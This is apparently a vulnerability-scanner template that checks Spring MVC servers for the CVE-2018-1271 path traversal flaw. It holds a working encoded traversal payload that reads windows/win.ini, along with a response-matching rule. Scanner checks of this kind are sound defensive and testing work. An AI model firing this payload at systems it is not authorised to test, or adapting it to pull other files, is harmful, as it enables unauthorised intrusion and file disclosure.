id: CVE-2018-1271 info: name: Spring MVC Path Traversal risk: High params: - root: '{{.BaseURL}}' variables: - endpoint: | static/ spring-mvc-showcase/resources/ requests: - method: GET url: >- {{.root}}/{{.endpoint}}%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 detections: - >- StatusCode() == 200 && StringSearch("resBody", "for 16-bit app support") references: - https://www.cvebase.com/cve/2018/1271